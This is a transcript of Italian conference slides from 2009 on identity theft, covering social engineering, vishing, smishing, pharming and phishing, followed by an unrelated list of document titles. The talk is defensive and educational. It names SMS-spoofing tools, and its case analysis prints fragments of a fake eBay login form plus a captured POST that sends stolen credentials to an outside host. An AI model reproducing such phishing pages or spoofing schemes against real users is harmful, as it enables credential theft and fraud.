Identity management Access nel web 2.0 Associazione Aica, Genova, 15 Settembre 2009
|
|
- Muzio Gattini
- 8 anni fa
- Visualizzazioni
Transcript
1 Identity management Access nel web 2.0 Associazione Aica, Genova, 15 Settembre 2009 Maurizio Aiello Consiglio Nazionale delle Ricerche Istituto di Elettronica ed Ingegneria dell'informazione e delle Telecomunicazioni
2 Furto di identità Social Engineering Phishing Vishing (Voice Phishing) Smishing (Sms phishing) Pharming (Attacchi DNS)
3 Social Engineering Studio del comportamento individuale al fine di carpire informazioni Migliore tecnica di crittanalisi attuale Footprinting, studio dello stile vocale, oppressione psicologica, tecnica della riconoscenza, richiesta di aiuto, boxing, etc. Kevin Mitnick, The Art of Deception
4 Vishing Voice Phishing Basato su Voice messaging IP per praticare attacchi di social engineering volti al furto di dati (personali, finanziari, confidenziali) Perchè IP? Linee fisse sono controllabili meglio (individuazione del chiamante), inoltre in questo modo posso fare chiamate da tutto il mondo gratis.
5 Vishing: motivi del successo 1) maggior fiducia sul vettore telefono piuttosto che sulla mail 2) Maggior diffusione del telefono piuttosto che della mail (soprattutto anziani); 3) Accettazione generalizzata dei sistemi a risponditore automatico. 4) Modalità di comunicazione sincrona (rapidità d'azione) 5) Maggior personalizzazione del messaggio che costituisce l'attacco 6) Call-center <-> co.co.pro. <-> accento straniero
6 Vishing: informazioni carpite Informazioni richieste:compleanno, dettagli carta di credito e bancomat (expiration date, security codes, pin), documenti (passaporto, National Ids). 1) Accesso ai conti bancari Utilizzi dell'attacco: 2) Acquisto beni su Internet e nel mondo reale 3) Trasferimento denaro e riciclaggio (vedi prossima slide) Falsificazione documenti (ad un controllo telematico tutto è ok).
7 Scenario: riciclaggio Ad Alice (Italia) vengono rubate le credenziali di accesso al conto Bob viene convinto tramite vishing ad effettuare transazioni Italia Estero trattenendosi il 10% Eve riceve da Bob il 90% dei soldi rubati ad Alice. Vantaggi: Italia Italia non ci sono controlli da parte della banca Le indagini si concentrano su Bob inizialmente (guadagno di tempo).
8 Vishing: technological benefit Telefoni raggiunti da ogni parte del mondo (e.g. Skype?) Costi minimi Mascheramento o impersonificazione del caller-id War dialing (automatizzazione), con creazione software di call-center fake. Difficoltà a effettuare il filtraggio (come invece avviene per il phishing) Proxy per il routing internazionale dei messaggi
9 Vishing: technoogical benefits Malware per diffusione e scalabilità del message delivery Riconoscimento dei toni per acquisire numeri Riconoscimento vocale automatizzato per acquisire altri dati personali
10 Vishing: esempio tramite Attacco simile al phishing, al posto dell'url c'è un numero di telefono da chiamare (Nazionale! Vedi skype) Caro cliente,... Banca XXX per proteggere i tuoi soldi ha bloccato il conto. Chiama lo 02/ per verificare i tuoi dati. Si esegue la chiamata, 4 o più scelte: 1 per movimenti e saldo conto 2 per effettuare transazioni 3 per sbloccare un conto bloccato 0 per parlare con un operatore
11 Vishing: Dobbiamo verificare... e in rapida successione: Numero di conto Data e luogo di nascita Numero di carta d'identità Pin e codici vari per l'accesso via Internet Alla fine viene effettuato il trasferimento verso operatore: Vero, rerouting verso call center reale Fake, cade la linea
12 Skype:numero regionale
13 Vishing: esempio voic Spingono a effettuare risposte immediate basate su bisogni effettivi: Come da lei richiesto domani sarà chiusa l'erogazione di corrente elettrica presso la sua abitazione. Per il saldo finale, le informazioni relative e per parlare con un operatore chiami il 02/ Varianti e add-ons: Si chiama un numero a pagamento (899...) Si mettono in piedi veri call-center alternativi ai risponditori automatici
14 Vishing: varianti Interviste a pagamento, al termine si chiedono tutti i dettagli (e qualcosa in più :-) del conto corrente per l'accredito Dumpster boxing: individuato il soggetto si cerca nel suo trash (es. le ricevute dei prelievi bancomat) e si eseguono attacchi personalizzati basati su conoscenza di fatti riservati (es. num. Bancomat o carta di credito)
15 Vishing:tracciabilità Chiamate uscenti: Fake caller-id Chiamate voip da internet, stessa difficoltà che tracciare un pc che commette abusi Chiamate entranti verso un call-center fake: Linea telefonica registrata con documenti falsi Linea voip (es. Skype): riesco a trovare gli estremi della carta di credito del criminale e basta User skype rubato, addebiti pagati con carte rubate.
16 Vishing: mms e sms E' stata richiesta l'apertura di un nuovo fido su Banca XXX; in caso questa richiesta non sia autorizzata da lei contattare 02/ Da proprio provider telefonico: hai superato il limite di traffico gratuito del mese: rispondi con il tuo codice della carta di credito per avere ulteriore traffico a 3euro. Scarica loghi, suonerie, gratuitamente!!!
17 Smishing: SMS Phishing Invio di sms fake tramite software ad-hoc che consente la manipolazione del mittente: software firesms siti smsforge.net, (da verificare) Attenzione, chiami il numero xxxxxxx di Servizi Interbancari per verificare la transazione della sua carta di credito al fine di evitarne usi fraudolenti Richiesta codici (voce preregistrata) e successiva attesa operatore non disponibile.
18 Smishing: converging technologies Lo hook (entità che cattura le informazioni) può essere sia un sito web (phishing) che un call-center (vishing) Si possono usare sia i telefoni sms che i gateway web per inviare i messaggi sms fake Si sono visti troiani (eliles.a) che si installano sul pc, si propagano come worm, tramite sms gateway fanno smishing con il target di inserire un troiano dentro Nokia N60.
19 Smishing: SMS Phising Motivi del successo: accettazione del cellulare come mezzo più riservato della posta elettronica (falso, war dialing, elenchi su web, vendita usato etc.) Accettazione della chiamata da/verso call center più facilmente che non contatto tramite web Truffa ai danni di Carta Sì, usando come mittente TIM o VISA.
20 Pharming Dopo attacco (spoofed server) Il server spoofed si presenta identico in tutte le sue forme a quello originale!! (normale phishing)
21 Pharming: motivi successo Di solito si controllano i link: No possibilità di controllo (dovrei interrogare DNS autonomi) Siti clonati perfettamente (ad es. acquistando un conto vero e facendo prove).
22 Pharming: info rubate Normale transazione: user, password, pincode vari richiesti durante la transazione Dati aggiuntivi richiesti ad-hoc: anagrafica, altri conti, assicurazioni, familiari etc.
23 Pharming: tecnologia Intrusione e modifica del Dns del provider della banca o via social engineering o tramite attacco diretto Dns cache poisoning sul provider della vittima Inserimento di troiano nel pc vittima e modifica del file c:\windows\system32\drivers\etc Inserimento di troiano nel pc vittima e modifica del registro con cambiamenti dei dns predefiniti.
24 Pharming: difese Buon antivirus Personal Firewall con controllo di accesso siti (quasi infattibile nella realtà Controllo dei certificati digitali offerti dai server (quasi certamente non eseguito)
25 Pharming: varianti e to-do Man in the middle attacks: le informazioni vengono carpite, usate per autenticarsi sul server vero e di conseguenza mostrate all'utente, aumentando la confidenza e la sensazione di sicurezza dello stesso.
26 Phishing Attacco proveniente da Solite tecniche di social engineering (il conto verrà chiuso, ci sono degli addebiti anomali, controllo delle credenziali etc.)
27 Phishing: tecnologia SMTP sender address spoofing Riproduzione fedele dei loghi e indirizzi di posta nella mail Riproduzione fedele del layout del sito (e.g. Usando ffline browsers) Offuscamento dei link (banale, oppure utilizzando indirizzi ip al posto dei link, o indirizzi ip in notazione tutta numerica
28 Phishing: esempio pratico
29 Phihing: analisi header Received: from nameserver.ge.cnr.it (nameserver.ge.cnr.it [ ]) by gentoo2.ieiit.cnr.it (Postfix) with ESMTP id 002C41FB6AD for Wed, 2 Jan :15: (CET) X-Greylist: delayed 548 seconds by postgrey-1.16 at nameserver.ge.cnr.it; Wed, 02 Jan :30:19 CET Received: from mail.ispotclothing.com (unknown [ ]) by nameserver.ge.cnr.it (Postfix) with ESMTP id 859CB1827B for <aiello@ Wed, 2 Jan :30: (CET) Received: from User by mail.ispotclothing.com with SMTP (Code-Crafters Ability Mail Server 2.55); Wed, 02 Jan :21: Reply-To: <member@ebay, it.ge.cnr.it> From: "Utente di ebay: goldenmovie" <member@ebay.it> Subject: Hai ricevuto una domanda sull'oggetto Date: Wed, 2 Jan :21:
30 Phishing: esempio pratico Contenuto di zmail.ru:
31 Phishing: analisi codice <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" " <meta http-equiv="content-type" content="text/html; charset=iso "><!--srcid: SignIn--> <title>benvenuto su ebay</title><script language="javascript"><!-- var pagename = "PageSignIn"; //--></script><script language="javascript"><!--... href=" nt_ssl_e5431it.css" media="all" rel="stylesheet"> </head> <body bgcolor="#ffffff" onload="doframesbuster();">......
32 Phishing: analisi codice <form method="post" name="signinform" onsubmit="setoptimcookie();" style="margin:0px" action= method=post enctype=x-www-form-urlencoded> <INPUT type=hidden value=yahoo name=mail_from> <INPUT type=hidden name=mail_to> <INPUT type=hidden value=ita name=mail_subject> <INPUT type=hidden value= <INPUT type=hidden value=0 name=smauthreason> <INPUT type=hidden value= name=target>... ID utente <td><input type="text" name="userid" maxlength="64" tabindex="1" value="" size="27"></td> <a name="password" style="text-decoration:none">password </a></td> <td><input type="password" name="pass" maxlength="64" value="" tabindex="2" size="27"></td>
33 Phishing: analisi diretta Basta perder tempo! Address A Address B Packets Bytes Packets A->B Bytes A->B Packets A<-B Bytes A<-B Risoluzione Tipo local_pc pages.ebay.it inversa local_pc www2.kjps.net inversa poi con la diretta scopro local_pc www2.fiberbit.net local_pc local_pc local_pc Akamai whois, inversa local_pc local_pc local_pc
34 Analisi pcap POST /form/mailto.cgi HTTP/1.1 Host: www2.fiberbit.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv: ) Gecko/ Firefox/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 228 Mail_From=Yahoo&Mail_To=cicciobello570%40hotmail.it&Mail_Subject=ITA&Next_Page=http%3A%2F%2Fwww.ebay.it %2F&SMAUTHREASON=0&TARGET=http%3A%2F%2Folgutza.nm.ru%2Fbpol%2Fcartepre%2Fgrazie.txt&userid=ci cciociccio&pass=ciaobello HTTP/ Found Date: Wed, 02 Jan :28:55 GMT Server: Apache/ (Unix) Location: Keep-Alive: timeout=2, max=19 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso
SICUREZZA INFORMATICA MINACCE
SICUREZZA INFORMATICA MINACCE Come evitare gli attacchi di phishing e Social Engineering Ver.1.0, 19 febbraio 2015 2 Pagina lasciata intenzionalmente bianca 1. CHE COSA È UN ATTACCO DI SOCIAL ENGINEERING?
Dettaglie quindi di navigare in rete. line può essere limitato a due persone o coinvolgere un ampio numero
Glossario Account (profilo o identità) insieme dei dati personali e dei contenuti caricati su un sito Internet o su un social network. Anti-spyware programma realizzato per prevenire e rilevare i programmi
DettagliInternet e posta elettronica. A cura di Massimiliano Buschi
Internet e posta elettronica A cura di Massimiliano Buschi Concetti fondamentali Internet www Tcp/ip Browser Terminologia Esistono un sacco di termini con cui bisogna famigliarizzare http url Link Isp
DettagliUSO DEGLI STRUMENTI DI PAGAMENTO ELETTRONICO
USO DEGLI STRUMENTI DI PAGAMENTO ELETTRONICO LA POLIZIA POSTALE E DELLE COMUNICAZIONI La Polizia Postale e delle Comunicazioni si occupa della prevenzione e repressione di tutti i reati commessi per il
DettagliLA STRONG AUTHENTICATION per la sicurezza dei pagamenti
LA STRONG AUTHENTICATION per la sicurezza dei pagamenti 1 NOVITÀ PER PAGAMENTI PIU SICURI 2 SCEGLI LA MODALITA DI STRONG AUTHENTICATION - SMART APP - BASIC SMS 3 COME SI ATTIVA LA STRONG AUTHENTICATION
DettagliAccedere al sito www.jokerbetting.com e una volta inserita la user e password si accede nel conto gioco.
Accedere al sito www.jokerbetting.com e una volta inserita la user e password si accede nel conto gioco. Registrazione Utenti. Selezionare la voce Agente e scegliere Nuovo Utente. Viene visualizzata una
DettagliLA STRONG AUTHENTICATION BASIC SMS
LA STRONG AUTHENTICATION BASIC SMS 1 NOVITA PER PAGAMENTI PIU SICURI 2 SCEGLI LA MODALITA DI STRONG AUTHENTICATION: BASIC SMS 3 COME SI ATTIVA LA STRONG AUTHENTICATION 4 NUOVA CONFERMA DELLE OPERAZIONI
DettagliGUIDA ALLA GESTIONE DEI TICKET REV. 1. guida_gestione_tck_rev1.doc - 1 di 9
GUIDA ALLA GESTIONE DEI TICKET REV. 1 guida_gestione_tck_rev1.doc - 1 di 9 INTRODUZIONE Dopo aver utilizzato internamente per alcuni anni il nostro software di Ticketing, abbiamo deciso di metterlo a disposizione
DettagliSicurezza e Rischi. Mi è arrivata una mail con oggetto: ATTENZIONE!!! chiusura sistematica del tuo conto VIRGILIO. Come proteggersi dallo Spam
Sicurezza e Rischi Mi è arrivata una mail con oggetto: ATTENZIONE!!! chiusura sistematica del tuo conto VIRGILIO Come proteggersi dallo Spam Come proteggersi da virus, trojan e malware Ci sono limitazioni
Dettagli- Corso di computer -
- Corso di computer - @ Cantiere Sociale K100-Fuegos Laboratorio organizzato da T-hoster.com www.t-hoster.com info@t-hoster.com La posta elettronica La Posta Elettronica è un servizio internet grazie al
DettagliLE CERTIFICAZIONI ECDL 12 GIUGNO 2014. Lucchetti Silvia
LE CERTIFICAZIONI ECDL 12 GIUGNO 2014 IL D.M. N. 308 DEL 22.05.2014 TABELLA A-B GRADUATORIA ASPIRANTI DOCENTI II-III FASCIA RICONOSCE UN MASSIMO DI 4 PUNTI PER LE CERTIFICAZIONI INFORMATICHE. SI PRECISA
DettagliMANUALE UTENTE. versione 1.0. INPS: Direzione Centrale Sistemi Informativi e Telecomunicazioni
MANUALE UTENTE versione 1.0 INPS: Direzione Centrale Sistemi Informativi e Telecomunicazioni PAGAMENTI ONLINE VIA INTERNET RISCATTI E RICONGIUNZIONI Versione 1.0 del 04/09/2007 Sommario 1. Premessa...3
DettagliINCONTRO DI STUDIO Sistemi di pagamento: la difesa dal furto di identità, profili normativi e i nuovi scenari tecnologici. Roma 22 maggio 2013
Responding to Life INCONTRO DI STUDIO Sistemi di pagamento: la difesa dal furto di identità, profili normativi e i nuovi scenari tecnologici Roma 22 maggio 2013 Il Furto d identità e gli italiani: tra
DettagliRisparmio Postale Online
Istruzioni Operative RPOL Ed. Gennaio 2013 Risparmio Postale Online Istruzioni operative Poste Italiane S.p.A. - Società con socio unico Patrimonio BancoPosta 1 di 8 Caratteristiche del servizio... 3 Chiavi
DettagliSecure E-Mail: domande e risposte
domande e risposte Indice Secure E-Mail: scopo e utilità Che cosa è Secure E-Mail? Perché La Suva introduce Secure E-Mail? Quali mail criptare? Che differenza c è tra Secure E-Mail e altri canali di comunicazione
DettagliL'INNOVAZIONE NELLE TUE MANI
TP6758 CARTA DI CREDITO PayPal L'INNOVAZIONE NELLE TUE MANI sito web www.paypal.it/cartadicredito telefono 055/3069181 indirizzo Findomestic Banca Spa, Casella Postale 6279 CS/Novoli 50127 Firenze La tua
DettagliINDICE: 1. CHE COS È 2. COME FUNZIONA 3. SEGMENTI/SOLUZIONI 4. VANTAGGI 5. DOVE SIAMO
1 INDICE: 1. CHE COS È 2. COME FUNZIONA 3. SEGMENTI/SOLUZIONI 4. VANTAGGI 5. DOVE SIAMO 2 O COLLECTSCONTACT: 1. CHE COS È Sistema Innovativo di Contatto; Tecnologia IVR Interactive Voice Response; Tecnologia
DettagliREOL-Services Quick Reference Ver. 1.1 Tecno Press Srl. 1
In questa semplice guida sono riportate tutte le informazioni relative alla prima registrazione e quelle relative alla configurazione dell ambiente di lavoro per poter utilizzare al meglio la nostra suite
DettagliSicurezza delle applicazioni web: protocollo HTTP
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Sicurezza delle applicazioni web: protocollo HTTP Alessandro Reina Aristide Fattori
DettagliSoftware Gestionale per Architetti. Listino prezzi - PROMOZIONALE. web: www.architettore.com mail: info@architettore.com
Software Gestionale per Architetti Listino prezzi - PROMOZIONALE web: www.architettore.com mail: info@architettore.com Pag. 1 Pag. 2 Pag. 3 Pag. 4 Pag. 5 Pag. 6 Pag. 7 Indice Licenze e Assistenza Aggiornamenti
DettagliINPS: Direzione Centrale Sistemi Informativi e Telecomunicazioni
INPS: Direzione Centrale Sistemi Informativi e Telecomunicazioni PAGAMENTI ONLINE VIA INTERNET BOLLETTINI LAVORATORI DOMESTICI Sommario 1. Premessa...3 2. Accesso alla applicazione...4 3. Pagamento online
DettagliSERVIZIO REFEZIONE SCOLASTICA GUIDA OPERATIVA PER LA PRENOTAZIONE DEI PASTI
SERVIZIO REFEZIONE SCOLASTICA GUIDA OPERATIVA PER LA PRENOTAZIONE DEI PASTI Dal punto di vista operativo, i genitori o chi per essi possono prenotare il pasto in modo semplice e veloce in 2 modalità, non
DettagliCon un bonifico da qualsiasi banca o Banco Posta utilizzando le seguenti coordinate:
FAQ LOTTOMATICARD 1- Cos è la Carta Lottomaticard? 2- Dove e come posso acquistarla? 3- Quanto costa? 4- Come posso ricaricare la carta? 5- Dove posso controllare il saldo ed i movimenti della mia carta?
DettagliGuida facile al network di pagamenti. Satispay. Satispay. Monetica. Accorciare le distanze
Guida facile al network di pagamenti Satispay Satispay Monetica. Accorciare le distanze GUIDA FACILE AL NETWORK DI PAGAMENTI Satispay Cos è Satispay Satispay è un innovativo network di pagamenti che consente
DettagliGUIDA UTENTE ANALISI MEDICHE PAVANELLO - PORTALEMEDICA. Data 27/09/2011 Versione 2.2 Applicazioni www.portalemedica.it GUIDA UTENTE SOGGETTI TERZI
ANALISI MEDICHE PAVANELLO - PORTALEMEDICA Data 27/09/2011 Versione 2.2 Applicazioni www.portalemedica.it GUIDA UTENTE SOGGETTI TERZI 1. INTRODUZIONE 2. PRIMO ACCESSO AL SITO 3. MODIFICA PREFERENZE 4. AUTENTICAZIONE
DettagliGuida alla Prima Configurazione dei Servizi
Guida alla Prima Configurazione dei Servizi Indice Indice Guida all attivazione del servizio centralino 3 A. Applicazione Centralino su PC 5 B. Gruppo Operatori 9 Gestione all attivazione dei servizi internet
Dettagligli apparati necessari per fare e ricevere telefonate e fax, dal centralino al singolo telefono alla linea telefonica.
PROGETTO Cosa è CHARDLINO Tutti siamo d accordo che il telefono sia ormai uno strumento irrinunciabile per qualsiasi attività lavorativa; qualsiasi Azienda non può più permettersi di non avere un telefono
Dettagli1. Compilazione dell istanza di adesione
1. Compilazione dell istanza di adesione Compilare l istanza di adesione dal sito dell Agenzia delle Dogane avendo cura di stampare il modulo compilato. In questa fase è necessario comunicare se si è in
DettagliGuida all utilizzo dell Area Riservata BperCard per le carte di credito. AZIENDE
Guida all utilizzo dell Area Riservata BperCard per le carte di credito. AZIENDE Indice COSA PUOI FARE NELL AREA RISERVATA AZIENDE 3 ISCRIVITI 4 ACCEDI 8 HOME AREA RISERVATA 9 INFORMAZIONI PRINCIPALI 10
DettagliLa posta elettronica. Informazioni di base sul funzionamento
La posta elettronica Informazioni di base sul funzionamento Il meccanismo della posta elettronica - 1 MARIO SMTP Internet SMTP/POP 1 2 3 LAURA Mario Rossi deve inviare un messaggio di posta elettronica
DettagliMINIGUIDA AI SERVIZI DI HOME BANKING
MINIGUIDA AI SERVIZI DI HOME BANKING Come operare con la propria banca usando Internet Scopo del documento: la presente miniguida è rivolta a coloro che si affacciano per la prima volta al mondo dell Home
DettagliPHISHING 1.0 COSE' E PERCHE' 1.1 Definizione e scopo 1.2 Da non confondere 2.0 TIPI DI PHISHING
PHISHING 1.0 COSE' E PERCHE' 1.1 Definizione e scopo 1.2 Da non confondere 2.0 TIPI DI PHISHING 2.1 Spear Phishing 2.2 Clone Phishing 2.3 Phone Phishing 3.0 SITI WEB FAKE 3.1 Come vengono creati 3.2 Come
DettagliF.A.Q. PROCEDURA SICEANT PER LE COMUNICAZIONI ANTIMAFIA (EX ART 87)
F.A.Q. PROCEDURA SICEANT PER LE COMUNICAZIONI ANTIMAFIA (EX ART 87) Raccolta delle problematiche più comuni nell installazione e configurazione della procedura SICEANT Sommario Caratteristiche generali
DettagliGuida all Utilizzo del Posto Operatore su PC
Guida all Utilizzo del Posto Operatore su PC 1 Introduzione Indice Accesso all applicazione 3 Installazione di Vodafone Applicazione Centralino 3 Utilizzo dell Applicazione Centralino con accessi ad internet
DettagliI TUTORI. I tutori vanno creati la prima volta seguendo esclusivamente le procedure sotto descritte.
I TUTORI Indice Del Manuale 1 - Introduzione al Manuale Operativo 2 - Area Tutore o Area Studente? 3 - Come creare tutti insieme i Tutori per ogni alunno? 3.1 - Come creare il secondo tutore per ogni alunno?
DettagliNetwork Troubleshooting 101
ICT Security n. 16, Ottobre 2003 p. 1 di 5 Network Troubleshooting 101 Il titolo prettamente americano vuole rispondere al momento di panico capitato a tutti quando qualche cosa non funziona più: si è
DettagliGuida al sistema di pagamento delle pratiche telematiche
Guida al sistema di pagamento delle pratiche telematiche Gentile Utente, per effettuare il pagamento delle pratiche telematiche deve accedere alla Home Page delle Banche Dati, dopo aver digitato la sua
DettagliMARKETING AUTOMATION CAMPAIGN
MARKETING AUTOMATION CAMPAIGN PIATTAFORMA PROFESSIONALE PER IL DIRECT MARKETING Validità: Dicembre 2013 Questa pubblicazione è puramente informativa. 24 ORE SOFTWARE non offre alcuna garanzia, esplicita
DettagliBenvenuto in Fineco. Guida all attivazione dei servizi
Benvenuto in Fineco Guida all attivazione dei servizi Entra in FIneco I servizi di Fineco 1 RICEVI I CODICI Codice attivazione Codice utente 2 ATTIVA I CODICI Password web Password telefonica PIN dispositivo
DettagliElementi di Sicurezza e Privatezza Lezione 1 - Introduzione
Elementi di Sicurezza e Privatezza Lezione 1 - Introduzione Chiara Braghin chiara.braghin@unimi.it Inziamo a interagire Chi prova a rispondere alle seguenti domande: w Cosa si intende per sicurezza informatica?
DettagliGuida alla Prima Configurazione dei Servizi
Guida alla Prima Configurazione dei Servizi Guida alla Prima Configurazione dei Servizi 1 Indice 1 Configurazione del Centralino-Numero di Servizio...3 1.1 A. Servizio Cortesia e Gestione Code...5 1.2
DettagliGuida all Utilizzo dell Applicazione Centralino
Guida all Utilizzo dell Applicazione Centralino 1 Introduzione Indice Accesso all applicazione 3 Installazione di Vodafone Applicazione Centralino 3 Utilizzo dell Applicazione Centralino con accessi ad
DettagliUNA PIATTAFORMA SICURA PER I PAGAMENTI ONLINE
UNA PIATTAFORMA SICURA PER I PAGAMENTI ONLINE Marco Gallone Sella Holding Banca 28 Novembre 2006 Il Gruppo Banca Sella ed il Commercio Elettronico Dal 1996 Principal Member dei circuiti Visa e MasterCard
Dettagli1. I REQUISITI DI ATTIVAZIONE
Net Designs Software S.L. Vietata la riproduzione o la diffusione di questo manuale senza l'autorizzazione corrispondente 2007-2011 Tutti i il diritti riservati CONTENUTO DEL MANUALE 1. Requisiti per l'attivazione
DettagliDURC Client 4 - Guida configurazione Firma Digitale. DURC Client 4.1.7
DURC Client 4.1.7 Guida configurazione firma digitale Attenzione: Per poter utilizzare la firma digitale con il Durc Client dalla versione 4.1.7 e successive è necessario riconfigurare la procedura di
DettagliMoneta Elettronica Utilizzo Vantaggi Sicurezza. A cura di Fabrizio Rossi
Moneta Elettronica Utilizzo Vantaggi Sicurezza A cura di Fabrizio Rossi > Home Banking > ATM (comunemente chiamati "Bancomat terminali self per prelevare contanti) > Carte di Credito > POS (Incasso pagamenti)
Dettagli2.5. L'indirizzo IP identifica il computer di origine, il numero di porta invece identifica il processo di origine.
ESERCIZIARIO Risposte ai quesiti: 2.1 Non sono necessarie modifiche. Il nuovo protocollo utilizzerà i servizi forniti da uno dei protocolli di livello trasporto. 2.2 Il server deve essere sempre in esecuzione
DettagliExpress Import system
Express Import system Manuale del destinatario Sistema Express Import di TNT Il sistema Express Import di TNT Le consente di predisporre il ritiro di documenti, pacchi o pallet in 168 paesi con opzione
DettagliInternet gratuita in Biblioteca e nei dintorni
Internet gratuita in Biblioteca e nei dintorni Per la navigazione è necessaria l iscrizione preventiva in Biblioteca, sia al Servizio Bibliotecario sia a quello internet Per poter accedere a Internet tramite
DettagliWindows Web Server 2008 R2 64bit 1x Processore Intel Atom Dual (2x core 1.80 GHz) Dispositivo di memorizzazione flash esterno 32GB
LabPro ver AC Servizio RAPPORTI DI PROVA ON-LINE (disponibile dalla ver. 6C-001) SERVIZIO RAPPORTI DI PROVA ON-LINE SERVIZIO RdP on-line MODULO Base Mette a disposizione dei clienti finali del laboratorio
DettagliProtezione della posta elettronica mediante crittografia
Consorzio per la formazione e la ricerca in Ingegneria dell'informazione Politecnico di Milano Protezione della posta elettronica mediante crittografia Davide Cerri CEFRIEL - Area e-service e Technologies
DettagliCos'è Smsevia? E' possibile scrivere un sms, salvarlo e, una volta connessi ad Internet, inviarlo. I vantaggi sono innumerevoli:
Cos'è Smsevia? Smsevia è un software che invia sms su ogni tipo di cellulare. Le caratteristiche di questo software e le sue funzioni sono riconducibili a quelle di un programma di posta elettronica. E'
DettagliOlimpovoce è la porta di accesso ai servizi e ai pannelli di configurazione delle propria utenza.
Come utilizzare OLIMPOVOCE e i suoi servizi Olimpovoce è la porta di accesso ai servizi e ai pannelli di configurazione delle propria utenza. L'accesso si effettua dal sito www.olimpovoce.it Per accedere
DettagliTi presentiamo due testi che danno informazioni ai cittadini su come gestire i propri
Unità 11 Questione di soldi CHIAVI In questa unità imparerai: come spedire i soldi all estero come usare il bancomat gli aggettivi e i pronomi dimostrativi questo e quello a costruire frasi negative con
DettagliINDICE DEGLI ARGOMENTI
INDICE DEGLI ARGOMENTI 1. BENVENUTO 1 2. MANUALE D USO VOICE BOX 2.1. COME FUNZIONA LA VOICE BOX 2.2. ATTIVAZIONE 2.3. MODIFICA PASSWORD E PIN 2.4. MODIFICA MESSAGGIO DI PRESENTAZIONE 2.5. UTILIZZO VOICE
DettagliUtilizzo della APP IrriframeVoice. Versione 1.0 maggio 2015
Utilizzo della APP IrriframeVoice Versione 1.0 maggio 2015 0.0 Installazione Sul telefono o sul tablet andare sullo store delle applicazioni per scaricare la APP A seconda del sistema operativo del telefono
DettagliDa oggi, FASTWEB è con te ogni giorno! Guida all attivazione - Famiglie
Da oggi, FASTWEB è con te ogni giorno! Guida all attivazione - Famiglie E adesso? Ti chiamiamo Entro qualche giorno FASTWEB ti contatterà per la verifica di: dati anagrafici; offerta commerciale sottoscritta;
DettagliFARO. Il Bancomat più vicino in tempo reale
FARO Il Bancomat più vicino in tempo reale FARO: Patti Chiari al via Che cosa è FARO FARO è la prima delle 8 iniziative di PATTICHIARI, il progetto voluto dalle banche italiane che dopo due anni di studi
DettagliChat. Connettersi a un server di chat. Modificare le impostazioni di chat. Ricevere impostazioni chat. Chat
2007 Nokia. Tutti i diritti sono riservati. Nokia, Nokia Connecting People, Nseries e N77 sono marchi o marchi registrati di Nokia Corporation. Altri nomi di prodotti e società citati nel presente documento
DettagliFirma Digitale Remota
Firma Digitale Remota Versione: 0.03 Aggiornata al: 06.05.2013 Sommario 1. Attivazione Firma Remota con OTP con Display o USB.... 3 1.1 Attivazione Firma Remota con Token YUBICO... 5 1.2 Attivazione Firma
DettagliClient - Server. Client Web: il BROWSER
Client - Server Client Web: il BROWSER Il client Web è un applicazione software che svolge il ruolo di interfaccia fra l utente ed il WWW, mascherando la complessità di Internet. Funzioni principali Inviare
DettagliLe nuove strade. Tiscali wiphone e Tiscali Unica. 18 settembre 2009
Le nuove strade Tiscali wiphone e Tiscali Unica 18 settembre 2009 I nuovi servizi Tiscali Tiscali wiphone Tiscali Unica (ADSL senza limiti + linea telefonica con chiamate illimitate verso numeri nazionali
DettagliSCENARI D'UTILIZZO DELLE NUOVE SOLUZIONI. Fabrizio Cassoni Content Security Manager fc@symbolic.it
SCENARI D'UTILIZZO DELLE NUOVE SOLUZIONI Fabrizio Cassoni Content Security Manager fc@symbolic.it Agenda: Introduzione a FSAV Client Security Nuove feature Gestione tramite Policy Manager Introduzione
DettagliInternet Explorer 7. Gestione cookie
Internet Explorer 7 Internet Explorer 7 è la nuova versione del browser di Microsoft disponibile per i Sistemi Operativi: Windows Vista, Windows XP (SP2), Windows XP Professional x64 Edition e Windows
DettagliI M P O S T A R E U N A C C O U N T D I P O S T A C O N M O Z I L L A T H U N D E R B I R D
I M P O S T A R E U N A C C O U N T D I P O S T A C O N M O Z I L L A T H U N D E R B I R D C O N F I G U R A R E L A M A I L 1) Aperto il programma, cliccare su strumenti > impostazioni account. 2) Si
DettagliManuale d uso. Servizio Segreteria Telefonica Memotel. per Clienti con linea Fibra
Manuale d uso Servizio Segreteria Telefonica Memotel per Clienti con linea Fibra 1 INDICE 1. GUIDA AL PRIMO UTILIZZO 2. CONFIGURAZIONE SEGRETERIA 3. CONSULTAZIONE SEGRETERIA 4. NOTIFICHE MESSAGGI 5. ASCOLTO
DettagliING DIRECT. LA TUA BANCA A CONTI FATTI.
ING DIRECT. LA TUA BANCA A CONTI FATTI. ING 10 volte DIRECT Se pensi alla banca il meno possibile, abbiamo lavorato bene. PER NOI Risparmiare non vuol dire rinunciare, ma saper scegliere. Fidarsi è bene,
DettagliINFORMATIZZAZIONE DEL SERVIZIO DI MENSA SCOLASTICA NUOVE MODALITA DI PAGAMENTO COMUNE DI AIRASCA
Torino, 16/09/2015 «cognome» «nome» «Scuola» «Classe» INFORMATIZZAZIONE DEL SERVIZIO DI MENSA SCOLASTICA NUOVE MODALITA DI PAGAMENTO COMUNE DI AIRASCA Con decorrenza aprile 2011 sono cambiate le modalità
DettagliMail Cube Guida utente
Mail Cube Guida utente Mail Cube è il software esclusivo di 3 che permette di inviare e ricevere le email in tempo reale direttamente dal tuo videofonino e complete di allegati. Mail Cube è disponibile
DettagliProcedura SMS. Manuale Utente
Procedura SMS Manuale Utente INDICE: 1 ACCESSO... 4 1.1 Messaggio di benvenuto... 4 2 UTENTI...4 2.1 Gestione utenti (utente di Livello 2)... 4 2.1.1 Creazione nuovo utente... 4 2.1.2 Modifica dati utente...
DettagliMANUALE SOFTWARE LIVE MESSAGE ISTRUZIONI PER L UTENTE
